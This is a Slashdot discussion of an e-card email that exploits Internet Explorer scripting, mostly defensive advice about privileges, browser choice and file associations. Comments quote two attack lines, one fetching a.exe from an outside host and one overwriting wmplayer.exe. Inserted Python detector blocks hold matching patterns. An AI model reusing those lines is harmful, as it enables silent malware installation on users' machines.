      For what it's worth, for me POPFile is down to about one misclassified email a month, either way. It's a very, very smart filter.

      --
      John
  23. ok... by pb · · Score: 1

    In that case, how about this... I'll send you this e-mail, and you can go open it in Outlook, and tell me what happened...

    --
    pb Reply or e-mail; don't vaguely moderate.
  24. Stay on your toes by J.+Jacques · · Score: 5, Insightful

    This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.

    --
    http://www.questionablecontent.net
    1. Re:Stay on your toes by ggvaidya · · Score: 1

      What can we, as Internet users, do to get the message around? I mean, sure, education, but despite computers going from being something for mathematicians to something for everybody in ten years, most of the people I know still treat computers as something that should "Just Work". Any suggestions?

      (Legal question: Tarring and feathering would be out of the question for anyone who propagates worms, right? Or could we argue violation of the Right to be Left in Peace?)

    2. Re:Stay on your toes by wud · · Score: 1

      they expect their computer to "Just Work",

      they should get a mac

      --
      wud
    3. Re:Stay on your toes by fulgan · · Score: 1

      As much as I'd like to agree with you (and I've said the exact same thing for a long time), blaming the users and their tendency to expect computers to "just work" isn't going to win. It's simply too remote from facts to be a valid point any more.

      In fact, I now consider the fact that a "normal" user simply cannot use a computer properly (regardless of OS and application) as a sign of failure from the technical community (and, as a programmer as well as a sysadmin, I take that rather personally).

      It's people like you and me that need to change the way they see computers. You simply can't expect everyone else to take 5 years of their life learning what a computer is and how to operate it properly in a dangerous environment. WE have to learn how to make computers both simpler and safer to use, as the trade-offs chosen by the software available today clearly miss the mark on one or both accounts.

    4. Re:Stay on your toes by Technician · · Score: 1

      I would like an OS to have protected system files kept in a Read Only Partition. It would go a long way to security. To make changes would require booting into a service mode, changing the read write status of the system partition, making changes and rebooting which resets the partition to read only if you forgot to do it. Is there anything out there other than the Linux Knoppix bootable CDs this secure?

      --
      The truth shall set you free!
  25. Re:It'd be scary if I ran my PC as Administrator.. by clester · · Score: 5, Funny

    You mean it could overwrite /usr/bin/xmms?

    --

    -- Real programmers don't comment their code. It was hard to write, it should be hard to understand.
  26. I hate spam by nycsubway · · Score: 5, Insightful

    I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

    - spam is cheap to produce
    - a sucker is born every day
    - even if 70% of the spam sent out doesn't get to its destination, millions of messages will still be received
    - spam filters are not installed on all mail servers
    - spam is CHEAP to produce (again)

    Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

    How can email on the internet remain free/cheap and still not allow spam to run rampant?

    1. Re:I hate spam by WormholeFiend · · Score: 1

      i still get snail-mail spam in my snail-mailbox, even though it costs money to the sender.

      and it's delivered by the mailman, along with my regular mail too, even though i have a "no-fliers" sticker on my box!

      the postman can consider himself lucky he comes by while i'm at work, otherwise i'd shove a bayesian filter up his...

    2. Re:I hate spam by thelasttemptation · · Score: 1

      Try "Return to Sender" a few times...

    3. Re:I hate spam by WormholeFiend · · Score: 1

      doesnt work with grocery store and pizza fliers.

      i'm tempted to start collecting my mail and leave the spam in the box til the postman has to empty the crap out himself.

    4. Re:I hate spam by mog · · Score: 2, Insightful

      I was under the impression that the rate of production of suckers was one per minute. Have we made headway in stemming this epidemic?

    5. Re:I hate spam by Technician · · Score: 1

      To prevent the post office from having to deliver tons of undeliverable mail to a landfill, undeliverable mail has an additional cost if returned. Senders use this extra cost item to cut down on the postage even though (last time I checked) it cost 50 cents per piece of undeliverable returned junkmail. Bounced e-mail should cost the sender. It would keep the spam lists smaller and up to date. Unfortunately forged headers will keep this from being used. The cost of sending is so low, they don't care about the undeliverables and don't care to clean up the list. They just point the bounces and Joe Job some unlucky Joe.

      How can email on the internet remain free/cheap and still not allow spam to run rampant?

      POP mail needs to go away. An authenticated mail delivery system is needed where bounced mails are guaranteed to get back to the sender. Mail lists will have to be pared down to manageable size so a mailing doesn't bury the sender's inbox. (full inbox should prevent outgoing mail. Make them deal with the invalid addresses and bounces) Everybody needs to know if their mail was delivered.

      --
      The truth shall set you free!
    6. Re:I hate spam by Yaa+101 · · Score: 1

      Simple, get rid of HTML in email, then all marketing/price balance will be ruined...
      It will take a few months but if HTML is stopped for email a lot of marketeers lose their jobs...

    7. Re:I hate spam by jnicholson · · Score: 1
      The cost of sending is so low, they don't care about the undeliverables and don't care to clean up the list. They just point the bounces and Joe Job some unlucky Joe.

      Ob-nitpick: What you describe is not a Joe-Job. A false sender / reply-to address in spam is standard practice. A Joe-Job is an effort to implicate an innocent party as the sender, by making the spam advertise something belonging to that innocent party, or by appearing to advantage that innocent party in some way.
      --
      "Do not drill any holes in your cat - it will not like it."
      -- Nick Davies
    8. Re:I hate spam by zero_offset · · Score: 1
      It's worse than you think. The percentage of spam that has to hit a live address for the run to be considered successful is more like a single-digit percentage. After all, the actual purchase rate from spam campaigns is a tiny fraction of one percent.

      Worse yet is the number of WILLING sysadmin accomplices out there, and I'm not even talking about the ISPs that openly support spammers. I don't remember where the articles are any more, but for awhile there was a lot of talk about van-based spammers literally bribing an admin at somebody's NOC -- then just driving up and running an ethernet cable through the back door, "borrowing" a company's bandwidth for the hour or so it took to blast out a few million H3RBAL V+I+A+G+R+A spams.

      That means the engineering problem must be tackled through either a total revamp of the mail system -- something everyone agrees is sorely needed, but will probably never happen because the installed base is so large, and people will inevitably bitch about the expense -- or purely at the end-user side, which is sort of like firing the military and hoping private citizens invest in privately-owned tanks, planes and ships.

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  27. noHTML for Outlook Express by TasosF · · Score: 5, Informative

    Quote from that article:

    Conclusion

    If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

    Or alternatively,

    you can use an HTML disabler like noHTML for Outlook Express

    1. Re:noHTML for Outlook Express by IWantMoreSpamPlease · · Score: 1

      In regards to the HTML disabler, Outlook Express 6 has an option to read everything in plain text. Solves the problem yes?

      --
      So rise up, all ye lost ones, as one, we'll claw the clouds.
    2. Re:noHTML for Outlook Express by fermion · · Score: 1
      So one receives an email saying this will disable HTML. The user, frightened by the recent news, clicks and installs it. It works great.

      Even if the program contains no additional payloads, is this behavior we wish to encourage: creating needless dangers (due to stupid default settings) that cause users to download and install unknown code?

      --
      "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
  28. in general? by RoceKiller · · Score: 1

    Do you mean at the moment, or in general?

    In general, that depends. If a security hole has been found which Microsoft haven't yet fixed, then it might very well be possible.

    At the moment I am not sure, but not as far as I know.

  29. Ugly is what ugly does by broothal · · Score: 5, Insightful

    This looks pretty ugly:

    x.Open("GET", "http://adversting.co.uk/a.exe",0);

    and should never have been implemented in a browser. After all, it's not a browser's task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

    1. Re:Ugly is what ugly does by Anonymous Coward · · Score: 0

      What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

    2. Re:Ugly is what ugly does by JCMay · · Score: 5, Interesting

      What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.


      There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

      There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

    3. Re:Ugly is what ugly does by Anonymous Coward · · Score: 0

      There's nothing wrong with viewing something in Acrobat Reader.

      Acrobat can use javascript too. Check the preferences. Somebody committed could use that feature as a starting point for a virus.

    4. Re:Ugly is what ugly does by CTachyon · · Score: 3, Informative

      Actually, that bit of code just downloads the malicious .EXE. It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for http://spy.malware.com/cgi-bin/report?firstname=John&lastname=Doe&underwear_type=boxers...), but it's not an instant security breach itself. The actual bug is...

      s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

      ...which overwrites Media Player with the downloaded malware using ADODB.Stream (which probably never should have been enabled as a trusted ActiveX control in the first place, and certainly shouldn't be automatically overwriting files without user intervention).

      --
      Range Voting: preference intensity matters
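An added example (not part of any comment here, and not the article author's code) of how a mail gateway could flag the download-then-overwrite pattern discussed above before the message reaches a client. The sample HTML is constructed from only the two statements quoted in this thread; the rule names and the functions `scan_html` and `verdict` are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the two statements quoted in this thread, in a script tag.
SAMPLE_HTML = r'''<html><body>
<script language="JavaScript">
x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</script>
</body></html>'''

FETCH = re.compile(r'\.open\s*\(\s*"(?:GET|POST)"\s*,\s*"(https?://[^"]+)"', re.I)
SAVE = re.compile(r'\.SaveToFile\s*\(\s*"([^"]+)"', re.I)
PROGID = re.compile(r'\bADODB\.Stream\b', re.I)
EXEC_EXT = re.compile(r'\.(?:exe|scr|pif|com|bat|cmd|dll)$', re.I)
PROTECTED = re.compile(r'^[a-z]:\\(?:program files|windows|winnt)\\', re.I)


class ScriptBodies(HTMLParser):
    """Collects the text of every <script> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def scan_html(html):
    """Return (rule, detail) findings for each script in an HTML mail body."""
    parser = ScriptBodies()
    parser.feed(html)
    parser.close()
    findings = []
    for body in parser.scripts:
        # Only the URL path is checked, so a ".com" host name does not match.
        fetched = [u for u in FETCH.findall(body)
                   if EXEC_EXT.search(urlparse(u).path)]
        # Undo JavaScript string escaping so paths compare as Windows sees them.
        writes = [w.replace("\\\\", "\\") for w in SAVE.findall(body)]
        for url in fetched:
            findings.append(("remote-executable-fetch", url))
        for path in writes:
            rule = "write-to-protected-path" if PROTECTED.match(path) else "file-write"
            findings.append((rule, path))
        if PROGID.search(body):
            findings.append(("activex-progid", "ADODB.Stream"))
        if fetched and writes:
            findings.append(("download-and-overwrite",
                             fetched[0] + " -> " + writes[0]))
    return findings


def verdict(findings):
    """Map findings to a gateway action."""
    rules = {rule for rule, _ in findings}
    if rules & {"download-and-overwrite", "write-to-protected-path"}:
        return "block"
    return "quarantine" if rules else "pass"


if __name__ == "__main__":
    for rule, detail in scan_html(SAMPLE_HTML):
        print(rule, detail)
    print("verdict:", verdict(scan_html(SAMPLE_HTML)))
```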
    5. Re:Ugly is what ugly does by zero_offset · · Score: 1
      It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for

      How is that more "dodgy" than simply navigating to spy.malware.com via script? After all, every "Slashdot Approved" browser can be scripted to do that, and your malware.com could simply navigate back to the referring page after logging John Doe's underwear preference.

      Agreed, though, it's the file-writing where things go all wrong.

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

    6. Re:Ugly is what ugly does by CTachyon · · Score: 1

      It's not navigating, it's just downloading the file (to RAM). It might sound a bit pedantic at first, but it doesn't try to render the contents, so there's no risk of e.g. exploits against the HTML render engine.

      --
      Range Voting: preference intensity matters
    7. Re:Ugly is what ugly does by zero_offset · · Score: 1

      I know it isn't navigating. The point is that by using an accepted feature of scripting -- navigation -- you can achieve exactly the same thing, so complaining about the ability to load text from a remote source is silly. After all, loading from remote sources is what browsers DO. It's the file writing and/or execution that should be the focus of the grandparent poster's ire.

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  30. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 2, Funny

    oops ... silly me ... obviously, I meant your Microsoft(R) Windows(TM) Media Player. Nope, sorry, the quick file replacement is a feature found only on Microsoft(R) systems. Us poor Linux lusers will have to use 'apt-get install' or other equally slow technique.

  31. I saw a similar type email by krray · · Score: 1, Interesting

    I saw a similar type email -- and after reading the article downloaded the a.exe file for review:
    $ file a.exe
    a.exe: MS-DOS executable (EXE), OS/2 or MS Windows

    Yep, appears to be an executable type file.

    Hey Microsoft -- this would be a HINT for inbound type files:
    $ chmod 700 a.exe

    Ready to execute -- what the heck. This is a sandboxed VMware type machine:
    $ ./a.exe
    sh: ./a.exe: cannot execute binary file

    Dag nabbit, what am I doing wrong? :)

  32. Redndant, I know. Don't run as Administrator. by gfecyk · · Score: 3, Interesting

    I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

    Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

    The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:Redndant, I know. Don't run as Administrator. by krray · · Score: 5, Informative
      I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

      Tell you what sparky -- YOU try that across an enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.

      Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.

      Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).

      Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...

    2. Re:Redndant, I know. Don't run as Administrator. by reuben04 · · Score: 2, Insightful

      I agree with your statement, but many of the windows based line of business applications out there "require" administrative privileges to run properly, forcing users to have administrative permissions. This is also an issue that I have not seen people thinking about lately.

    3. Re:Redndant, I know. Don't run as Administrator. by nehril · · Score: 2, Informative

      sure, and then your CD burner doesn't work. or your scanner doesn't scan. there are LOTS of end user programs out there that assume and require that you run with Admin privileges.

      That being said, having IE download and run executables remains risky even if you are not admin: a trojan/backdoor can just as easily run from your home directory or your own "Startup Items" folder.

      the intrepid attacker can then run all manner of other exploits/social engineering once he has a local irc zombie. Of course, the sad truth is that none of this is necessary. Just send a plain zipped virus.exe and lots of people WILL run it.

    4. Re:Redndant, I know. Don't run as Administrator. by JTunny · · Score: 2, Insightful

      Switching between user levels on windows isn't as simple as it is on a *nix machine. The time/memory overhead switching would send me crazy.

    5. Re:Redndant, I know. Don't run as Administrator. by Tom · · Score: 2

      The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root.

      True, good point.

      Everyone here keeps missing the underlying problem because of their anti-M$ bias.

      True as well. However, it does contribute very much that windos very much encourages this unsafe behaviour, while all Linux and *BSD systems I know go to great pains to discourage it.

      --
      Assorted stuff I do sometimes: Lemuria.org
    6. Re:Redndant, I know. Don't run as Administrator. by rbanzai · · Score: 3, Insightful

      Okay, run as a Regular User under Win XP.

      Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.

      Wheee!

      Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.

    7. Re:Redndant, I know. Don't run as Administrator. by Silburn_Luke · · Score: 1

      When WinXP Home edition ships with an out-of-the-box install that doesn't start you off as passwordless Administrator (sorry 'Owner') with all services running and provides some way to upgrade to a properly implemented file permissioning system without requiring use of CACLS from the command line, then you will have a point. Until that day you don't.

      MSoft *say* they are taking security seriously these days, but their marketing/usability reflexes are still calling the shots when tradeoffs have to be made. While that remains true there will always be too many people running Winboxen with Admin privileges for comfort.

      Regards
      Luke

      --
      #include witty_one_liner.h
    8. Re:Redndant, I know. Don't run as Administrator. by 0123456 · · Score: 3, Insightful

      "The same thing can happen to an idiot running Mozilla under Linux as root,"

      Except:

      a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.

      b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.

      c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.

      Those are just three reasons why most people run as Administrator on Windows and don't on Linux.

    9. Re:Redndant, I know. Don't run as Administrator. by ktulu1115 · · Score: 3, Insightful

      You seem to be missing the point. Browsers shouldn't allow this:

      x.Open("GET", "http://adversting.co.uk/a.exe",0);
      s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
      etc...

      This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but that's not an excuse for IE's pisspoor security.

      --
      # fuser -v /dev/attention | grep work
      #
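The two calls quoted in this thread (a GET for a remote .exe, then SaveToFile onto wmplayer.exe with mode 2, which is ADODB's adSaveCreateOverWrite) are simple to flag in a mail or proxy filter. The sketch below is an added example, not code from the article or from any commenter; the sample pages, the host files.example.invalid and every function name are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from pathlib import PurePosixPath, PureWindowsPath
from urllib.parse import urlsplit

EXEC_EXT = {".exe", ".scr", ".bat", ".com", ".pif", ".cmd"}
PROTECTED_DIRS = {"program files", "windows", "winnt"}

# x.Open("GET", "<url>", ...)
FETCH_RE = re.compile(
    r'\.open\s*\(\s*["\']GET["\']\s*,\s*["\']([^"\']+)["\']', re.I)
# s.SaveToFile("<path>", <mode>)
SAVE_RE = re.compile(
    r'\.SaveToFile\s*\(\s*(["\'])(.*?)\1\s*(?:,\s*(\d+))?\s*\)', re.I | re.S)

# Constructed sample: only the two statements quoted in the thread,
# with a placeholder host. The rest of the script is deliberately absent.
SAMPLE_ECARD = r'''<html><body>
<p>You have received a greeting card!</p>
<script language="JavaScript">
x.Open("GET", "http://files.example.invalid/a.exe",0);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</script></body></html>'''

# Constructed benign page: fetches data but never writes a file.
BENIGN_PAGE = '''<html><body>
<script>x.open("GET", "/news.xml", true); document.title = "News";</script>
</body></html>'''


class ScriptExtractor(HTMLParser):
    """Collect the text of every <script> element in a message body."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def analyze(html_text):
    """Return one finding per SaveToFile call that looks like a file drop."""
    parser = ScriptExtractor()
    parser.feed(html_text)
    findings = []
    for script in parser.scripts:
        # Remote fetches whose URL path ends in an executable extension.
        fetched = [
            url for url in FETCH_RE.findall(script)
            if PurePosixPath(urlsplit(url).path).suffix.lower() in EXEC_EXT
        ]
        for _quote, raw_path, mode in SAVE_RE.findall(script):
            # JavaScript source writes each backslash twice; undo that.
            target = PureWindowsPath(raw_path.replace("\\\\", "\\"))
            reasons = []
            if target.suffix.lower() in EXEC_EXT:
                reasons.append("writes an executable file")
            if len(target.parts) > 1 and target.parts[1].lower() in PROTECTED_DIRS:
                reasons.append("target is under a system directory")
            if mode == "2":
                reasons.append("mode 2 (adSaveCreateOverWrite) replaces an existing file")
            if fetched:
                reasons.append("same script fetches a remote executable")
            if reasons:
                findings.append(
                    {"target": str(target), "fetched": fetched, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_ECARD):
        print(finding["target"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

String matching of this kind is defeated by obfuscated script, so it belongs alongside the controls argued for in the thread (patched browser, no write access to Program Files), not in place of them.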
    10. Re:Redndant, I know. Don't run as Administrator. by just+fiddling+around · · Score: 2, Insightful

      So the solution to stupid system design is rewarding stupid system designer by buying a new version?!? No sane person would do that for a car! I am certain nobody would have bought a Pinto II because the Pinto was "supported no more and it is their fault they still drive an exploding car because the new version is all right".

      --
      You're not old until regret takes the place of your dreams.
    11. Re:Redndant, I know. Don't run as Administrator. by poot_rootbeer · · Score: 1

      Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user.

      I haven't tried this myself, so maybe this is a dumb question, but... shouldn't the act of installing a new application be an Administrator task to begin with?

      Is it the case that even if you install as Administrator, other user accounts won't be able to run the app?

    12. Re:Redndant, I know. Don't run as Administrator. by Anonymous Coward · · Score: 0

      Mcafee is pants anyway, but in my company VirusScan 4.5.1 and 7.0 (both are enterprise editions) update perfectly correctly when logged in as a limited or even guest user.

      And if you find out about it 3 months later then you aren't much of a systems administrator.

      Don't you ever test software before you roll it out?

    13. Re:Redndant, I know. Don't run as Administrator. by upside · · Score: 2, Interesting

      It's atrocious how Windows apps STILL don't get written for multiuser and low-privilege user environments.

      Take for example Adobe's Photoshop 7 and Pagemaker 7. These came out way after Win2K. You have to make their respective folders and registry entries world writable before they start working for normal users.

      I'm not sure about the latest CS versions, but I have my doubts.

      --
      I'm sorry if I haven't offended anyone
    14. Re:Redndant, I know. Don't run as Administrator. by seanvaandering · · Score: 2, Interesting

      Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

      Sometimes it's needed to be said, and I'll agree, as a linux newbie in my own right, I knew enough to know that running as root on my machine was the stupidest thing I could do. Also in Mandrake 9.2 - if you DO try to log in as root, your desktop is completely RED - a very annoying, but effective color.

      I think the biggest problem is that people think that because they OWN their computer that they should immediately have full access to EVERYTHING, including the fact that I have the right to run as administrator. Now I'm not debating that you can't run as admin, I'm stating that if someone made you a pilot today and gave ya a nice DC-10 on the runway, just because someone gave you something you have no clue how to use, would you just go and run with it? The unfortunate part is that computers look and act so "easy-to-use" - that while happy user is happily clicking away on "remove spam from your e-mail - click here" windows, that the damage is already being done - and they don't even know it. Now here's the catch: when you TELL them that you should run as a regular user, they look at you like you came from another planet and say "yeah right - it's my computer and I'll damn well do what I please with it!" - which is great until they start calling you up for tech support because "It runs slow", or "It doesn't work" or [fill in your worst nightmare here].

      Cheers.

    15. Re:Redndant, I know. Don't run as Administrator. by Anonymous Coward · · Score: 0

      I thought Lindows ran as root by default? Okay, it's hardly the best example of Linux security, but it does happen.

  33. Sounds familar by Anonymous Coward · · Score: 1, Informative

    This or a very similar attack has been around since at least November, 2003. It makes use of an exploit that is supposed to be fixed by the latest IE patch:

    Cumulative Security Update for Internet Explorer (832894)

    1. Re:Sounds familar by prairieson · · Score: 1

      Yep, it looks like the author of the website is describing the Naldem/Divux trojan, discovered back in November of last year. It also appears that most virus protection packages have contended with it already.

      --
      Quomodo cogis comas tuas sic videri?
  34. German dialer spam gangs used "e-cards", too. by DocSnyder · · Score: 4, Interesting

    About a year ago, German email users have been spammed with similar e-cards, which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year to stop this kind of fraud.

    1. Re:German dialer spam gangs used "e-cards", too. by Anonymous Coward · · Score: 0

      Art and beauty is defined by the eye of the beholder. In case you wanna know :-)

  35. Equivalent of chmod 700 for Windows by gfecyk · · Score: 2, Informative

    > Hey Microsoft -- this would be a HINT for inbound type files:
    > $ chmod 700 a.exe

    Similarly, deny Execute permissions in %temp% to regular users and even power users with NTFS permissions. Sure this isn't done by default, but it only needs to be set once.

    In a corporate environment under Win2K or XP, you can deny Execute permissions for the entire Documents and Settings folder, where each user's %temp% is stored, and also for %systemroot%\temp if you actually still run 16-bit programs.

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:Equivalent of chmod 700 for Windows by greed · · Score: 1

      Are you really sure it only needs to be done once?

      My experience with WindowsUpdate is that some of my paranoid settings are reset after each patch. So if you patch, you may get to do it more than once. And you'll never know when....

    2. Re:Equivalent of chmod 700 for Windows by gfecyk · · Score: 1

      > My experience with WindowsUpdate is that some
      > of my paranoid settings are reset after each
      > patch.

      Fair question. I've not known of a patch or Service Pack that reset NTFS permissions on existing files, except for the IIS Lockdown Tool which is doing what it was designed to do.

      I know Win2K SP3 and SP4 insist on re-enabling Automatic Updates.

      Also, I tend to do a lot of things before the fact that avoid needing to patch every day or even every month. Such as using a good firewall (Hey I use Linux 2.4! On Snapgear equipment!) and using e-mail software that refuses to open executable attachments. Period. Enforced by a system or group policy.

      Of course users can't install patches without Admin privilege, so no worries about a patch getting in under my nose.

      --
      Use Evolution instead of Outlook? Bewa
  36. Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 5, Interesting
    wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

    I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

    My solution: I renamed wscript.exe and cscript.exe so they can't execute.

    1. Re:Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 4, Informative
      Wscript is the default app for .js and .vbs files. All you have to do is change the launching program. You could set them to open with notepad instead. Here's a batch file, save it with a .bat extension:
      ftype JSFile=%SystemRoot%\notepad.exe "%1"
      ftype VBSFile=%SystemRoot%\notepad.exe "%1"
    2. Re:Using Mozilla on Windows won't protect you ... by brauwerman · · Score: 1

      How does one find the mapping from extension to filetype.
      You mention .js -> JSFile and .vbs->VBSFile, but suppose I want a .sh file to open in notepad?

      These don't work:

      ftype sh=%SystemRoot%\notepad.exe "%1"
      ftype SHFile=%SystemRoot%\notepad.exe "%1"

      Any idea?

      Thanks,
      Mike

    3. Re:Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 1, Informative
      Create a new file association with the assoc command. Such as
      assoc .sh=SHFile
      Then assign a command line to the newly created filetype
      ftype SHFile=%SystemRoot%\notepad.exe "%1"
    4. Re:Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 0

      It's probably a good idea to use two percent signs instead of one, if you put the commands in a batch file. The DOS window needs to have the % sign escaped, otherwise it'll interpret %1 as a command line argument.

    5. Re:Using Mozilla on Windows won't protect you ... by brauwerman · · Score: 1

      Thank you!

      Cross-platform kornshell scripts, no longer a dream!
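The two-step lookup discussed in this sub-thread (extension to file type via assoc, file type to command line via ftype) can be audited from saved output of the two commands. This is an added example, not code from any commenter; the sample output is constructed, including a JSFile entry showing what an unescaped "%1" inside a batch file leaves behind, and all function names are hypothetical.

```python
import ntpath

# Windows Script Host binaries named in the thread.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed sample of `assoc` output (extension -> file type).
ASSOC_OUTPUT = """.js=JSFile
.vbs=VBSFile
.vbe=VBEFile
.wsf=WSFFile
"""

# Constructed sample of `ftype` output (file type -> command line).
# JSFile: remapped from a .bat file with a single % sign, so %1 expanded to nothing.
# SHFile: a file type was created, but no `assoc .sh=SHFile` was ever run.
FTYPE_OUTPUT = r'''JSFile=C:\WINDOWS\notepad.exe ""
VBSFile=%SystemRoot%\System32\WScript.exe "%1" %*
VBEFile=%SystemRoot%\notepad.exe "%1"
SHFile=%SystemRoot%\notepad.exe "%1"
'''


def parse_pairs(text):
    """Parse KEY=VALUE lines; keys are lower-cased (registry names ignore case)."""
    pairs = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key:
            pairs[key.lower()] = value
    return pairs


def handler_exe(command):
    """Lower-cased executable name at the start of an ftype command line.

    Assumes an unquoted executable path contains no spaces.
    """
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]
    else:
        exe = command.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def audit(assoc_text, ftype_text):
    """Classify each extension and list file types no extension points at."""
    assoc = parse_pairs(assoc_text)    # ".js"    -> "JSFile"
    ftypes = parse_pairs(ftype_text)   # "jsfile" -> command line
    report = {}
    for ext, filetype in assoc.items():
        command = ftypes.get(filetype.lower())
        if command is None:
            status = "no-handler"       # assoc exists, ftype does not
        elif handler_exe(command) in SCRIPT_HOSTS:
            status = "script-host"      # double-click still executes the script
        elif "%1" not in command and "%l" not in command.lower():
            status = "filename-lost"    # handler never receives the file name
        else:
            status = "ok"
        report[ext] = (filetype, status)
    used = {filetype.lower() for filetype in assoc.values()}
    orphans = sorted(name for name in ftypes if name not in used)
    return report, orphans


if __name__ == "__main__":
    report, orphans = audit(ASSOC_OUTPUT, FTYPE_OUTPUT)
    for ext, (filetype, status) in sorted(report.items()):
        print(f"{ext:6} {filetype:10} {status}")
    print("file types without an extension:", ", ".join(orphans) or "none")
```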

  37. Amazing, really by mao+che+minh · · Score: 4, Insightful
    It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villains.

    And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

    1. Re:Amazing, really by Secrity · · Score: 1

